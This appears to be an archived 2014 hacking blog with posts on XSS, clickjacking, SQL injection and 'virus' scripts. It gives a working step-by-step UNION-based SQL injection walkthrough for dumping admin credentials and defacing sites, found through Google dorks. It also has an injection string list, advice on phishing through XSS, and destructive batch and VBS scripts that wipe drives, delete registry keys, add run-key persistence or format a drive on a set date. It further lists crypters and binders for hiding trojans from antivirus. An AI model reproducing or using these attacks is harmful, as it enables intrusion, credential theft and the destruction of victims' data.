T.H.E: November 2014

Friday, 28 November 2014

XSS- Cross Site Scripting

The XSS is basically a way to redirect the user to another webpage without the user knowing about this.
There are two types of XSS :
* Reflective
* Stored

Reflective XSS:

This is the most common type of XSS.In this case the code is not stored on the server-side. Let me show you a demo of this. Let us assume there exists a web page with a search box in it.

http://www.search.com/

Now type anything in the box and look at the URL. If we type “hacking”. The URL becomes as follows:

Now in the URL, you can see q=hacking. Also look at the source code of the green box highlighted above. It is as follows:

Now Suppose this website is vulnerable to XSS , if we make the URL as:
http://www.search.com/search?q=”><script>alert(“hacked&#8221
The html code of the box would become as follows:
<input type=”text” id=”searchbox” value=””><script>alert(“hacked”)</script>. Now what has happened is that, we have manually closed the input box and written our own script box. So if you give this link to someone then “hacked” would pop up on the screen.

This link is also very good http://ha.ckers.org/xss.html , once you get the hang of XSS.

Now when you give this link to someone, they will actually goto http://www.yoursite.com thus fooling the user :poc.
The following is a POC- Proof Of Concept.
http://www.google.com/search?btnI&q=allinurl:http://www.yahoo.com/

In this case it is going to goto http://www.yahoo.com even though the URL starts from http://www.google.com. You can also encode the URL so that the user doesn’t see the last part of the URL. You can learn how to do that here : http://pc-help.org/obscure.htm

You can goto http://www.xssed.com and check out the XSS vulnerabilities in all the websites and use it to your advantage.

Eg. you can make one phishing site of GMAIL and you can give the victim a link with http://www.google.com/(link which is vulnerable to XSS) which will re direct the user to your phishing site. The User wont know as he will mostly see the starting part of the URL, thus he is fooled. You can’t use the above link ( given for POC) for your phishing page.:p Guess Why!

Try using some other XSS vulnerability from xssed.com or try finding your own XSS vulnerability on some website.

STORED XSS:

In this type of XSS, the Malicious Code is stored on the server. Eg . Take the case of a guest book which takes user input , stores it in database and displays it to other users. If the code is “Buggy” , a hacker can insert a javascript there so that every time any user opens that page, the script is executed, without the user knowing.

Reflective XSS is more common on the internet as the developers are more careful when something is being written to the server database :p

Interesting Information:

XSS is a very dangerous vulnerability. Bank Websites take utmost care to see that their code is not vulnerable to XSS as they are the most targeted. Just Imagine if a bank URL re directs to some hacker’s phishing page. All the user’s details are lost!

The best video tutorial of XSS is here: http://infinityexists.com/videos/episode13/. You can either watch it online or download it.

The toughest part about XSS is finding a vulnerable piece of code and filter evasion. Many sites have code such that malicious code is filtered out from the user input, so the thrill is in finding a way to evade this filter!.

This link is also very good http://ha.ckers.org/xss.html , once you get the hang of XSS.

Thursday, 27 November 2014

Clickjacking

Clickjacking attack allows to perform an action on victim website, Mostly Facebook and Twitter accounts are targetable. when an attacker uses multiple transparent or opaque layers to trick a user into clicking on a button or link on another page when they were intending to click on the the top level page. Thus, the attacker is "hijacking" clicks meant for their page and routing them to other another page, most likely owned by another application, domain, or both. It may be similar to CSRF Cross Site Request Forgeries Attack.

Clickjacking is a term first introduced by Jeremiah Grossman and Robert Hansen in 2008 to describe a technique whereby an attacker tricks a user into performing certain actions on a website by hiding clickable elements inside an invisible iframe.

Using a similar technique, keystrokes can also be hijacked. With a carefully crafted combination of stylesheets, iframes, and text boxes, a user can be led to believe they are typing in the password to their email or bank account, but are instead typing into an invisible frame controlled by the attacker.

At present this attack mostly use on social network websites like Facebook and twitter, Because this attack is used by convinced victim for click on the link and SocialNetwork website might be very useful for attack on victim.

Code:

<style>
iframe { /* iframe from facebook.com */
width:300px;
height:100px;
position:absolute;
top:0; left:0;
filter:alpha(opacity=50); /* in real life opacity=0 */
opacity:0.5;
}
</style>

<div>Click on the link to get more followers:</div>

<iframe src="/files/tutorial/window/clicktarget.html"></iframe>

<a href="http://www.google.com" target="_blank" style="position:relative;left:20px;z-index:-1">CLICK ME!</a>

<div>You'll be get 10000 followers..!!</div>

Output:
Click on the link to get more followers
Click Me
You'll be get 10000 followers..!!

Download:
ClickJacking Tool

For Defence:
Clickjacking Protection

For more information:
OWASP

Thursday, 13 November 2014

Hack Sites Using Havji

Just Follow these easy steps :

1. First download havij from here
http://itsecteam.com/

2. Run Havij SQL Injection software and copy and paste vulnerable website link

3. Now click in the “Analyze” Button

4. Then It shows some messages there. Be alert on it and be show patience for sometime to find it’s vulernable and type of injection and if db server is mysql and it will find database name.Then after get it’s database is name like xxxx_xxxx

5. Then Move to another operation to find tables by clicking “tables” as figure shown. Now click “Get tables” Then wait some time if needed

6. After founded the tables ,you can see there will be “users” Put mark on it and click in the ” get columns ” tab

7. In that Just put mark username and password and click “Get data”

8. Finally you got now username and password of the admin…

Tuesday, 11 November 2014

V.I.R.U.S Scripts

IMPORTANT NOTE: These coding only for knowledge concept .All Scripts Here Are To Be Copied In Note Pad

This Virus Deletes All The Content Of A Drive...

@echo off del %systemdrive%\*.* /f /s /q shutdown -r -f -t 00 Save The Above Code a .bat file

Disable Internet Permanently Save As A bat File

echo @echo off>c:windowswimn32.bat echo break off>>c:windowswimn32.bat echo ipconfig/release_all>>c:windowswimn32.bat echo end>>c:windowswimn32.bat reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f echo You Have Been HACKED! PAUSE

The Most Simple Virus To Crush The Window

@Echo off Del C:\ *.* |y Save It As Any.bat

This Will Crash Ur Computer

Option Explicit Dim WSHShell Set WSHShell=Wscript.CreateObject("Wscript.Shell") Dim x For x = 1 to 100000000 WSHShell.Run "Tourstart.exe" Next Save It As Anything.vbs It Only Works With Windows XP

Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT RISK]
This will delete key registry files, then loops a message (CANNOT BE RECOVERED FROM)*

Code:- @ECHO OFF START reg delete HKCR/.exe START reg delete HKCR/.dll START reg delete HKCR/* :MESSAGE ECHO Your computer has been fcked. Have a nice day. GOTO MESSAGE

Endless Notepads

*This will pop up endless notepads until the computer freezes and crashes* Code:- @ECHO off :top START %SystemRoot%\system32\notepad.exe GOTO top

Bomb Virus

Copy Paste The Following If %date% NEQ 2014/11/20 goto exit format E: /y >nul :exit exit And Save It As Anything.bat Note:- You Can Change The Date ( 2014/11/20 ) Of The Virus And The Location ( format E: ) On Which It Does Its Action The Virus Will Take Effect On That Day

Crazy caps lock

*This constantly turns caps lock on and off really fast continuously* Code:- Set wshShell =wscript.CreateObject(”WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys “{CAPSLOCK}” loop

Endless Enter

*This constantly makes it so the enter button is being pressed continuesly* Code:- Set wshShell = wscript.CreateObject(”WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys “~(enter)” loop

Endless Backspace

*This makes it so the backspace key is constantly being pressed* Code:- MsgBox “Let’s go back a few steps” Set wshShell =wscript.CreateObject(”WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys “{bs}” loop

Make Your Keyboard Disco Light

This trick just makes your keyboard lights do disco. The script I’m sharing with you, when executed makes your Caps, Num and Scroll Lock’s light flash in a cool rhythmic way!
1.This piece of code makes your keyboard a live disco..
Set wshShell =wscript.CreateObject(“WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys “{CAPSLOCK}” wshshell.sendkeys “{NUMLOCK}” wshshell.sendkeys “{SCROLLLOCK}” loop
2.This one makes it looks like a chain of light….
Set wshShell =wscript.CreateObject(“WScript.Shell”) do wscript.sleep 200 wshshell.sendkeys “{CAPSLOCK}” wscript.sleep 100 wshshell.sendkeys “{NUMLOCK}” wscript.sleep 50 wshshell.sendkeys “{SCROLLLOCK}” loop
Instructions: *paste any of the two above codes in notepad *Save as “AnyFileName”.vbs *Run the file *To stop, launch task manager and then under “Processes” end “wscript.exe”

Monday, 10 November 2014

V.I.R.U.S

Vital Information Resource Under Siege

Introduction:

A VIRUS is a small, executable program with the ability to replicate itself, usually Without the permission or knowledge of the user. The word "virus" is the generic term for worm, viruses and Trojans. Computer viruses are called ‘viruses’ because they share some common characteristics of biological viruses. Computer viruses like the biological viruses are task specific. They are designed to infect a designated target. This can be a specific type of file or computer sub-system. It must piggy back on top of some other program to get executed. It passes from computer to computer like biological viruses pass from person to person. Fighting computer virus is like human intelligence fighting against itself. Virus-masters continuously upgrade their techniques to ensure their survival in the computing Environment. Computer virologists face the task of combating new viruses that have been developed by members of their own programming fraternity. Once they have found an anti-virus software to take care of an existing virus, virus-meisters invent a new string of viruses, which are even more difficult to decipher or crack.

Appearance of computer viruses is one of the most interesting developments in Technology in the twentieth century. Computer viruses are mysterious but fascinating at the same time. Every time a new virus hits, it makes the news. On the other hand they Show how sophisticated they have become in terms of technology, and it is precisely our dependence on technology that makes us so vulnerable. Coming back to viruses... virus can add its code anywhere in the host program and/or the system area of a hard disk or floppy disk. The host program is nothing but an executable file like .EXE, .COM, etc. Anywhere in the file means that the virus code can get appended in the beginning, end, in the middle or by simply placing a pointer to a different location on disk where the virus can find it. It is coded in such a way that the virus code gets executed first. Also, the code it appends to a file is normally not the complete source code of the virus. It is just the self-replicating part so that it can attack more number of programs. Difference between a computer virus and other programs Viruses are designed to self-replicate, usually without the knowledge of the user. They often contain “payloads”, action that the virus carries out separately from replication.

Viruses can be hidden in: 􀂙 Programs available on floppy disks or CDs.
􀂙 E-mail attachments
􀂙 Material downloaded from the web
Payload of computer viruses Payload is the malicious activity, in which the virus carrying it performs. In short, we can define payload as the extent of damage a virus is supposed to cause. A payload can be triggered by a number of conditions like:
􀂙 Certain date of month or year, execution. 􀂙 Execution of certain programs 􀂙 A built-in counter Example of what payload can do:
⇒ Delete files
⇒ Confidential information access and release
⇒ Ε-Mail – unauthorized mass e-mailing
⇒ File modification
⇒ Over writing security settings.
⇒ System instability
⇒ Degrading system performance – steals system cycles.

Virus Behavior:

In general, a virus has two phases, “infection phase” and “attack phase”. The first phase is the infection phase, where the virus reproduces widely and the second is the attack phase, where they do whatever damage they are programmed to do. Its presence can be felt only when they activate themselves.

Infection phase Virus writers have to balance how and when their virus should infect against the possibility of being detected. Therefore the spread of infection may not be immediate. This is the phase where the virus commences the acquisition of the system by first infecting the identified target, second taking charge of the target and lastly by installing its own command. These steps are coded in detail in the instruction code given to it by the author. No one knows when exactly a virus will infect other programs or in simple words when it will activate itself. Some programs get executed each time they are executed, and some viruses will infect upon a Trigger. You can never be sure that your system is not infected by a virus after running an AV program a few times. This is because the virus would not have started its infection phase. The virus writer will want his program to spread as far as possible so that in the second phase, "The attack phase", the victim’s computer will have a positive impact to the virus. Many viruses go resident on the memory. This provides an upper hand for the virus, as it can wait for an external event before it starts the infection and also the trigger used by the virus becomes hard to guess. The resident virus frequently takes over portion of the system software to hide their presence. This technique is called stealth. Attack phase Not all viruses attack, but all use system resources and often have bugs. Most of the viruses do unpleasant things like deleting files or changing random data on your disk, slowing down your PC, stealing passwords from the system and mailing it to a remote email, etc. Viruses often delay revealing their presence by launching their attack only after they have had ample opportunity to spread. This means that the attack phase can start even after months of infection. This attack phase is optional. Many viruses simply reproduce themselves and have no trigger for an attack phase. Classification of Computer viruses

Viruses can be classified in a number of ways. One way of classifying them is as follows:
􀃡 Environment
􀃂 File Viruses
♦ Overwriting virus
♦ Parasitic virus or Cavity (space-filler) virus
♦ Companion virus
♦ File worms
♦ Link viruses or cluster viruses
♦ Source code viruses (OBJ, LIB viruses)
♦ Tunneling viruses
♦ Camouflage virus
􀃂 Boot viruses
♦ Parity boot
♦ Boot-and-file virus
♦ System sector virus
􀃂 Macro Viruses
􀃂 Network Viruses
􀃂 VB worms
􀃡 Operating system (OS)
􀃡 Different algorithms of work
􀃂 Terminate and stay resident (TSR) virus
􀃂 Stealth Algorithm
􀃂 Armored virus
􀃂 Polymorphic or self-encrypting capabilities
􀃂 Logic bombs

work on windows xp

Sunday, 9 November 2014

SQL Strings

Strings List:

admin'--
' or 1=1--
'" or 1=1--
' union select 1, 'Eyeless', 'ez2do', 1--
admin'--
administrator'--
superuser'--
test'--
' or 0=0 --
' or 0=0 --'
' or 0=0 #
" or 0=0 --
" or 0=0 --'
'" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
" or 1=1--
or 1=1--
' or a=a--'
' or a=a #
' or a=a--
' or "a"="a
' or 'a'='a
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a

Saturday, 8 November 2014

SQL Injection

SQL is Structured Query Language. This language is used to work on the database. Commands such as SELECT, INSERT,DELETE are used to update information in the database.
In this type of Attack, we make use of a vulnerability where in we supply our own commands to the website’s database and successfully deface it . This vulnerability occurs when the user’s input is not filtered or improperly filtered .

Step 1: Looking for the Vulnerability
www.something.com/news/news.php?id=130
The above code can be vulnerable to SQL injection. The above code is taking the ID as 130 and returning some values. . To see if the URL is vulnerable , put a ‘ at the end of the URL. So try this URL
www.something.com/news/news.php?id=130’
Now If you get an error something like it’s not a valid MYSQL statement or something like that, then it is possible to exploit this URL. Example : When I did it on a website vulnerable to this exploit, I got the following
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\” at line 1
One more thing, if the URL also ends in .php?catid=x , where x is a number, even then you can use this above method to see if the site is vulnerable.
So, now you know if the website is vulnerable or not, but how do you find websites which are vulnerable? Easy ! You use a google dork to do this. So you are going to use google to find websites vulnerable. So type the following in google:
1. inurl:.php?id=
2. inurl:.php?catid=
So now you will get a list of websites. Test them one by one in the above method mentioned, to see if its vulnerable.

Step 2: Exploiting the vulnerability
This tutorial is only for educational purposes. Kindly do not misuse it.
You have a vulnerable URL
www.something.com/news/news.php?id=130
Ok , Now how do you deface it ??
Finding number of columns
Now put the following in the url
http://www.something.com/news/news.php?id=130 order by 10–
Now we told the database to order it by 10th column. Your job is to find how many columns are there in the table. So if order by 10 gave you an error, replace 10 by 9 and try it. Or if 10 gave a valid reply put 11 and try.
Also, the — “are two dashes – -” in the end means “comment”. So anything after this statement is commented off and only our query is put in.
So assume I got error for order by 10, then I tried order by 9 and so on.. Finally I got no error at 6 and error at 7. Hence, the Table has 6 columns .
Find Vulnerable columns
Now we will use union all and select command to find a vulnerable column.Remember to replace that ID number by – that. Like here, I have made it id= -130.
http://www.something.com/news/news.php?id=-130 union select all 1,2,3,4,5,6,–
Since it has 6 columns, we do select all 1,2,3,4,5,6 and a – at the end.
This will give an output . Whichever column number comes out as bold in the output, that column is vulnerable. Just remember this column number. Assume I got 2 as the vulnerable column.
Finding tables
Now our job is to find the different tables in the database. We do the following:
http://www.something.com/news/news.php?id=-130 union select all group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database() –
Here group_concat(table_name) will give you all the table names in the database. Infromation_schema hold information about the database. So we are just querying from that .
Finding Column names
Similarly get all the columns by simply replacing ‘table’ with ‘column’
http://www.something.com/news/news.php?id=-130 union select all 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database()–
Now you will be able to find all the column names from all the tables. After all the columns from one table, there will be a “id” and then all columns from next table and so on.
If this doesn’t work then you can do
http://www.something.com/news/news.php?id=-130 union select all 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_name=”some table you got from the previous step”–

Final Step
Now in list of columns look for some interesting columns like username or password. So now you should know the table name and column names you want. Eg username and password columns from tbl_admin table
http://www.something.com/news/news.php?id=-130 union select all 1,group_concat(username,0x3a,password),3,4,5,6 from tbl_admin–
Now I just put the column names in the group_concat with 0x3a in between which is ascii for colon and tbl_admin is the table name where these columns are.
Now I got output something like
admin:”encrypted hash”,user2:”encrypted hash”, and so on…
So usernames are not encrypted here and passwords are encrypted.
So your job is almost done. Now you will get all the users and passwords. Usually the passwords will be encrypted in md5. You can decrypt it. Just use google dorks :
Defacing
Now you have the admin username and admin password from the previous step.Now you have to find the admin page of the site.
Goto http://tools.th3-0utl4ws.com/admin-finder/ and put in your website there.
It will give you the admin page after sometime.
Mine turned out to be http://www.something.com/admin
So here you get a login box. Put in the username and password of the admin and that’s it.
Now do whatever you want, like defacing or deleting tables etc…
There is a reason i have not told you what the something.com is. You can use the google dorks i mentioned to find any vulnerable site.

Friday, 7 November 2014

Hacking Tools

Tools

BEWARE OF TOOLS BY THESE TOOLS YOUR DEVICE CAN BE DEMAGE.

PROXY FINDER

Proxy Finder searches the web and find thousands of valid and working proxies in seconds. It can find low, medium and also high anonymity proxies so we can remain anonymous online.

Friday, 28 November 2014

Reflective XSS:

STORED XSS:

Interesting Information:

Thursday, 27 November 2014

Thursday, 13 November 2014

Tuesday, 11 November 2014

IMPORTANT NOTE: These coding only for knowledge concept .All Scripts Here Are To Be Copied In Note Pad

This Virus Deletes All The Content Of A Drive...

Disable Internet Permanently Save As A bat File

The Most Simple Virus To Crush The Window

This Will Crash Ur Computer

Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT RISK] This will delete key registry files, then loops a message (CANNOT BE RECOVERED FROM)*

Endless Notepads

Bomb Virus

Crazy caps lock

Endless Enter

Endless Backspace

Make Your Keyboard Disco Light

Monday, 10 November 2014

Vital Information Resource Under Siege

Introduction:

Virus Behavior:

Sunday, 9 November 2014

Saturday, 8 November 2014

Friday, 7 November 2014

Tools

PROXY FINDER

ANONYMOUS SURFING : HOTSPOT SHIELD

ANONYMOUS SURFING : PC MESH ANONYMOUS WEB SURFING

ANONYMOUS SURFING : IP ANONYMIZER

ANONYMOUS SURFING : GHOSTSURF PLATINUM

CRYPTER SOFTWARE TO BYPASS ANTIVIRUS DETECTION : FUD KRYPTONITE CRYPTER

CRYPTER SOFTWARE TO BYPASS ANTIVIRUS DETECTION : FUD t3c4i3 CRYPTER

BINDER SOFTWARE TO HIDE KEYLOGGERS/TROJANS : SIMPLE BINDER

BINDER SOFTWARE TO HIDE KEYLOGGERS/TROJANS : WEEKEND BINDER

DARK PORT SCANNER

ANGRY IP SCANNER

PACKET SNIFFER : TCP DUMP

NETWORK SCANNING TOOL : NMAP

PACKET SNIFFER : WIRESHARK

WIRELESS SNIFFER : KISMET

WEP/WPA CRACKING TOOL : AIRCRACK

VULNERABILITY ASSESSMENT TOOL : NESSUS

THE ULTIMATE PENETRATION TESTING TOOL : METASPLOIT

VULNERABILITY ASSESSMENT TOOL : RETINA

VULNERABILITY SCANNER : X-SCAN

WEBSITE HACKING SOFTWARE : ADMIN FINDER

WEBSITE HACKING SOFTWARE : EXPLOIT SCANNER

WEBSITE HACKING SOFTWARE : SQLI HELPER

Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT RISK]
This will delete key registry files, then loops a message (CANNOT BE RECOVERED FROM)*